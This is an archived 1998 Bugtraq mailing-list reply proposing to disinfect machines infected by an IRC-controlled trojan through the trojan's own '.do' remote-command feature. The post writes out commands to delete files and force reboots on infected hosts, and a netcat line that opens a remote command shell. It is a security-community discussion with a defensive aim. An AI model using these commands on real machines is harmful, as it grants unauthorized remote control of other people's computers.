[8114] in bugtraq
Re: Internet Wide DOS Attack using IRC
daemon@ATHENA.MIT.EDU (George Imburgia)
Sat Oct 3 14:08:29 1998
Date: Sat, 3 Oct 1998 08:30:08 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <004901bdee68$73f530a0$48fc60cf@cortex>
On Fri, 2 Oct 1998, Samuel Cossette wrote:
> When a clone (Havoc call an infected computer a "Drone") is connected on irc
> anybody can control this with Private msg command (.join #chan, .part, .do
> [raw command]). 2-3 week ago the infected chan get about 500-700 drones
> (stable). My personnal estimation of infected computer it's 15000+.
With the DO command enabled, they gave us the means to remotely disable
this trojan.
Something to the effect of;
msg <nick> .do del c:\windows\system\oce*.*
Then, msg <nick> .do <some evil command to lock up the machine, forcing a
reboot>.
I'd be happy to write something cleaner and more specific, if someone
could forward me a copy of this trojan, or at least a directory listing of
the c:\windows\system directory on an infected machine.
The mIRC DO command is very powerful, and can be used to install netcat on
the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
-p <any port> <your ip> -t -e command.com, giving a remote command prompt
to investigate/disinfect the machine.
Anyone with a copy of this, feel free to mail me here, or contact
Phatass on EFnet.
______________________________________________________________________________
George Imburgia e-mail: gti@hopi.dtcc.edu
Systems Administrator Phone: (302)739-4068
Delaware Technical & Community College Fax: (302)739-3345
Office of the President Pager: (302)741-5962
